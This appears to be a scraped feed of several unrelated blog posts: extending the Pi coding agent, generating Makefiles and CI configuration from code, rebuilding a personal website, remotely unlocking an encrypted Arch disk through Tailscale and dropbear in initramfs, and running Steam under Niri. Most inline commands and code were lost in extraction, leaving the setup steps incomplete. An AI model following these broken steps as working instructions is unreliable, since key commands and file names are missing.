And I do use an agent-specific issue tracker that works locally, which I had my agent build itself. And because I wanted the agent to also manage to-dos, in this particular case I decided to give it a tool rather than a CLI. It felt appropriate for the scope of the problem and it is currently the only additional tool that I’m loading into my context. But for the most part all of what I’m adding to my agent are either skills or TUI extensions to make working with the agent more enjoyable for me. Beyond slash commands, Pi extensions can render custom TUI components directly in the terminal: spinners, progress bars, interactive file pickers, data tables, preview panes. The TUI is flexible enough that Mario proved you can run Doom in it . Not practical, but if you can run Doom, you can certainly build a useful dashboard or debugging interface. I want to highlight some of my extensions to give you an idea of what’s possible. While you can use them unmodified, the whole idea really is that you point your agent to one and remix it to your heart’s content. I don’t use plan mode . I encourage the agent to ask questions and there’s a productive back and forth. But I don’t like the structured question dialogs that happen if you give the agent a question tool. I prefer the agent’s natural prose with explanations and diagrams interspersed. The problem: answering questions inline gets messy. So reads the agent’s last response, extracts all the questions, and reformats them into a nice input box. Even though I criticize Beads for its implementation, giving an agent a to-do list is genuinely useful. The command brings up all items stored in as markdown files. Both the agent and I can manipulate them, and sessions can claim tasks to mark them as in progress. As more code is written by agents, it makes little sense to throw unfinished work at humans before an agent has reviewed it.
Because Pi sessions are trees, I can branch into a fresh review context, get findings, then bring fixes back to the main session. The UI is modeled after Codex, which makes it easy to review commits, diffs, uncommitted changes, or remote PRs. The prompt pays attention to things I care about so I get the call-outs I want (e.g. I ask it to call out newly added dependencies). An extension I experiment with but don’t actively use. It lets one Pi agent send prompts to another. It is a simple multi-agent system without complex orchestration, which is useful for experimentation. Lists all files changed or referenced in the session. You can reveal them in Finder, diff in VS Code, quick-look them, or reference them in your prompt. quick-looks the most recently mentioned file, which is handy when the agent produces a PDF. Others have built extensions too: Nico’s subagent extension and interactive-shell , which lets Pi autonomously run interactive CLIs in an observable TUI overlay. These are all just ideas of what you can do with your agent. The point is mostly that none of this was written by me; it was created by the agent to my specifications. I told Pi to make an extension and it did. There is no MCP, there are no community skills, nothing. Don’t get me wrong, I use tons of skills. But they are hand-crafted by my clanker and not downloaded from anywhere. For instance I fully replaced all my CLIs or MCPs for browser automation with a skill that just uses CDP . Not because the alternatives don’t work, or are bad, but because this is just easy and natural. The agent maintains its own functionality. My agent has quite a few skills and crucially I throw skills away if I don’t need them. I for instance gave it a skill to read Pi sessions that other engineers shared, which helps with code review. Or I have a skill to help the agent craft the commit messages and commit behavior I want, and how to update changelogs.
These were originally slash commands, but I’m currently migrating them to skills to see if this works equally well. I also have a skill that hopefully helps Pi use rather than , but I also added a custom extension to intercept calls to and to redirect them to instead. Part of the fascination that working with a minimal agent like Pi gave me is that it makes you live that idea of using software that builds more software. That taken to the extreme is when you remove the UI and output and connect it to your chat. That’s what OpenClaw does and given its tremendous growth, I really feel more and more that this is going to become our future in one way or another. First of all, it has a tiny core. It has the shortest system prompt of any agent that I’m aware of and it only has four tools: Read, Write, Edit, Bash. The second thing is that it makes up for its tiny core by providing an extension system that also allows extensions to persist state into sessions, which is incredibly powerful. https://x.com/steipete/status/2017313990548865292 ↩
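A four-tool core of the kind described (Read, Write, Edit, Bash) is small enough to sketch in full. This is purely illustrative of the idea, not Pi's actual API; all names here are made up.

```python
import subprocess
from pathlib import Path

# Illustrative only: a generic four-tool core in the spirit described
# above (read / write / edit / bash). This is NOT Pi's actual API.

def tool_read(path):
    return Path(path).read_text()

def tool_write(path, content):
    Path(path).write_text(content)
    return f"wrote {len(content)} bytes to {path}"

def tool_edit(path, old, new):
    target = Path(path)
    text = target.read_text()
    if old not in text:
        return "error: old text not found"
    target.write_text(text.replace(old, new, 1))
    return "ok"

def tool_bash(command):
    result = subprocess.run(command, shell=True, capture_output=True, text=True)
    return result.stdout + result.stderr

# An agent loop would dispatch the model's tool calls through this table;
# everything else (skills, TUI widgets, session trees) layers on as extensions.
TOOLS = {"read": tool_read, "write": tool_write,
         "edit": tool_edit, "bash": tool_bash}
```

The striking part is that `bash` subsumes almost everything else: with a shell and a filesystem, the agent can extend itself, which is exactly the philosophy the post describes.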

Fernando Borretti 1 month ago

Some Data Should Be Code

I write a lot of Makefiles . I use Make not as a command runner but as an ad-hoc build system for small projects, typically for compiling Markdown documents and their dependencies. Like so: And the above graph was generated by this very simple Makefile: (I could never remember the automatic variable syntax until I made flashcards for them.) It works for simple projects, when you can mostly hand-write the rules. But the abstraction ceiling is very low. If you have a bunch of almost identical rules, e.g.: You can use pattern-matching to collapse them into a “rule schema”, by analogy to axiom schemata: Which works backwards: when something in the build graph depends on a target matching , Make synthesizes a rule instance with a dependency on the corresponding file. But pattern matching is still very limited. Lately I’ve been building my own plain-text accounting solution using some Python scripts. One of the tasks is to read a CSV of bank transactions from 2019–2024 and split it into TOML files for each year-month, to make subsequent processing parallelizable. So the rules might be something like: I had to write a Python script to generate the complete Makefile. Makefiles look like code, but are data: they are a container format for tiny fragments of shell that are run on-demand by the Make engine. And because Make doesn’t scale, for complex tasks you have to bring out a real programming language to generate the Makefile. I wish I could, instead, write a file with something like this: Fortunately this exists: it’s called doit , but it’s not widely known. A lot of things are like Makefiles: data that should be lifted one level up to become code. Consider CloudFormation . Nobody likes writing those massive YAML files by hand, so AWS introduced CDK , which is literally just a library 1 of classes that represent AWS resources. Running a CDK program emits CloudFormation YAML as though it were an assembly language for infrastructure.
And so you get type safety, modularity, abstraction, conditionals and loops, all for free. Consider GitHub Actions . How much better off would we be if, instead of writing the workflow-job-step tree by hand, we could just have a single Python script, executed on push, whose output is the GitHub Actions YAML-as-assembly? So you might write: Actions here would simply be ordinary Python libraries the CI script depends on. Again: conditions, loops, abstraction, type safety, we get all of those for free by virtue of using a language that was designed to be a language, rather than a data exchange language that slowly grows into a poorly-designed DSL. Why do we repeatedly end up here? Static data has better safety/static analysis properties than code, but I don’t think that’s foremost in mind when people design these systems. Besides, using code to emit data (as CDK does) gives you those exact same properties. Rather, I think some people think it’s cute and clever to build tiny DSLs in a data format. They’re proud that they can get away with a “simple”, static solution rather than a dynamic one. If you’re building a new CI system/IaC platform/Make replacement: please just let me write code to dynamically create the workflow/infrastructure/build graph. Or rather, a polyglot collection of libraries, one per language, like Pulumi .  ↩

Andy Bell 1 month ago

It really is the year of the website

I keep talking about it so I’m finally doing it. You might be looking at my website right now, thinking “this looks a bit basic m8” and you’d be right. It’s because I’m building this website in iterations. The version you see now is the “wireframe” shell version and there’s lots more versions to come. Today, I’ve published the first post of a series on Piccalilli where I redesign and re-build this thing in the open. The hope is that it inspires you to build and maintain your own corner of the internet. I’ve also been (borderline desperately) trying to think of something to write about in 2026. Doing more practical building stuff is the direction I’ve landed on. It links back to what I was talking about in my end of year wrap up , in the Be human and improve your own skills section: There’s been a bit of a culture of “I don’t need to bother doing that because of AI” and let me tell you — from someone who has been doing this stuff for nearly 20 years — that is a dangerous position to put yourself in. No single technology has surpassed the need for personal development and genuine human intelligence. You should always be getting incrementally better at what you do. Now, what I am not saying is that you should be doing work work out of hours. You are not paid enough and frankly, the industry does not value you enough. Value yourself by investing your time in skills that make you happy and fulfilled . In that section , I also say “make yourself, and maintain, a personal website”. I’ve had a website for a long time, but I couldn’t really maintain it anymore because frankly, I built it with my elbows. The previous iteration served me well, sure, but I want something to learn the new stuff with, to enjoy working on and to embrace the art . Me writing about that as I go is just the cherry on the top. I hope you’ll follow along as I do that! You can read the first post in the series here .


remotely unlocking an encrypted hard disk

Your mission, should you choose to accept it, is to sneak into the earliest parts of the boot process, swap the startup config without breaking anything, and leave without a trace. Are you ready? Let's begin. In which our heroes are introduced, and the scene is set. For a very long time I had a beat-up old ThinkPad that couldn’t hold a charge for the life of it, especially when running Windows. It tended to die a lot when I was traveling, and I travel a lot. To save battery when I’m away from home, I often ssh back into my home desktop, both so I have persistent state even if my laptop battery dies, and so I get much faster builds that don’t kill the battery. This has two small problems: For a long time I solved 1. by enabling “Power On” after “Restore AC Power Loss” in the BIOS and 2. with tailscale . However, I recently installed Arch with an encrypted boot partition, which means that boot doesn’t finish until I type in the encryption password. Well. Well. What if I Simply put tailscale in initramfs? In which our intrepid heroes chart the challenges to come. Oh, right. If you weren’t aware, early boot in a Linux operating system 1 is just running a full second operating system that happens to be very small, lol. That’s loaded from a compressed archive file in /boot 2 and run from memory, with no access to persistent storage. This OS running from memory is called initramfs (initial RAM filesystem). So when you see a screen like this: That’s actually a whole-ass OS, with a PID 1 and service management and everything. This is how, for example, can show you stats about early boot — there’s another copy of systemd running in initramfs, and it passes its state off to the one in the main OS. Well. That implies we can install things on it ^^. There’s three parts to this: We also want to make this as secure as possible, so there’s some more things to consider: We can solve this in a few ways: Some background about Tailscale’s ACLs (“access control lists”).
Tailscale’s users are tied to their specific login method: you can, for example, add a passkey, but that passkey counts as a fully separate user from your original account. Tailscale also has “groups” of users, which are what they sound like, “ auto groups ”, which again are what they sound like, “hosts”, which are machines connected to the network, and “tags”. Tags are odd, I haven't seen anything like them before. They group hosts, not users, and when you add a tag to a host, that counts as its login method, rather than the host being tied to a user account. A consequence of this is that the group does not include tagged machines, because tagged machines aren’t tied to a user account. (A second consequence is that you can’t remove all tags from a machine without logging out and logging back in to associate it with your user account.) So we can write a policy like this: This says “allow devices tied to a user account to access any other device, and allow no permissions at all for devices tied to a tag”. here is my desktop, and is its initramfs. 3 Because initramfs is just a (mostly) normal Linux system, that means it has its own PID 1. On Arch, that PID is in fact just systemd. That means that we can add systemd services to initramfs! There's a whole collection of them in ( is the tool Arch uses to regenerate initramfs). We need two services: an SSH server (I went with ) and something to turn on networking, which this collection names . It's possible to run directly, rather than having a separate SSH server, but I didn't find any way to configure tailscale's SSH command, and I don't want to let anyone have a shell in my initramfs. In which our heroes execute their plan flawlessly, sneaking in without a sound. If you follow these steps on an Arch system, you should end up with roughly the same setup as I have. Most of these commands assume you are running as root.
Install the dropbear SSH server:
Install the systemd packages:
Add networking ( ), tailscale ( ), and dropbear ( ) to :
Set up the keys for your new tailscale device:
In the tailscale web console , mark your new device with , and disable key expiry. It should look something like this:
In , configure dropbear to only allow running the unlock command and nothing else:
Tell systemd to wait forever for a decryption password. I use , so I edited . Under , I extended the existing to . 4
Copy your public keys into so they get picked up by the dropbear hook:
Generate a new public/private keypair for use by the dropbear server. Without this, the dropbear hook will try to load keys from openssh, which means they'll be shared between early boot and your normal server. In particular that would mean your SSH server private keys would be stored unencrypted in initramfs.
Set up early networking. (Note: these instructions are only for Ethernet connections. If you want WiFi in early boot, good luck and godspeed.) All this rigamarole is necessary because the OS doesn't set the network interfaces to predictable names until late boot, so it needs some way to know which interface to use.
Last but not least, rebuild your initramfs: .
Next time you reboot, you should be able to ssh into and get a prompt that looks like this:
In which a moral is imparted, and our scene concluded. The takeaway here is the same as in all my other posts: if you think something isn't possible to do with a computer, have you considered applying more violence?
and I believe in Windows, although I’m less sure about that ↩
sometimes /boot/EFI ↩
Here “initrd” stands for “initramdisk”, which is another word for our initramfs system. ↩
See the docs for more information about this. ↩
Sometimes my home loses power and the desktop shuts off. Sometimes when the power comes back on it has a new public IP.
Networking in initramfs
Tailscale in initramfs
SSH in initramfs
Putting tailscale in initramfs means that it has unencrypted keys lying around. Tailscale keys expire (by default) after 90 days. At that point this will all break. You really really don’t want people to get SSH access to your early boot environment.
Use Tailscale ACLs to only allow incoming connections to initramfs, not outgoing connections. Set the key to never expire. Set the SSH server to disallow all shells except the actual unlock command ( ).
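The ACL policy itself didn't survive in the text above. As a hedged illustration only (not the author's actual file), a default-deny policy of the shape described could look like this in Tailscale's HuJSON policy format, where `autogroup:member` matches devices tied to a user account and therefore excludes tagged machines:

```json
{
    "acls": [
        // Tailscale policies are default-deny: anything not listed is blocked.
        // Devices tied to a user account (autogroup:member) may reach anything,
        // including tagged devices. Tagged devices match no rule at all, so the
        // initramfs host can accept the unlock connection but initiate nothing.
        {
            "action": "accept",
            "src": ["autogroup:member"],
            "dst": ["*:*"]
        }
    ]
}
```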

Jason Scheirer 1 month ago

Steam on non-Conventional Desktops (Niri)

I’m trying out Niri ! You know how I encourage getting used to the defaults ? Well, I’m not following my own advice! I’m using it with Dank Shell too, also ignoring my own advice! Anyhow! One-liner! If Steam isn’t working, do this: edit and change the line to this:
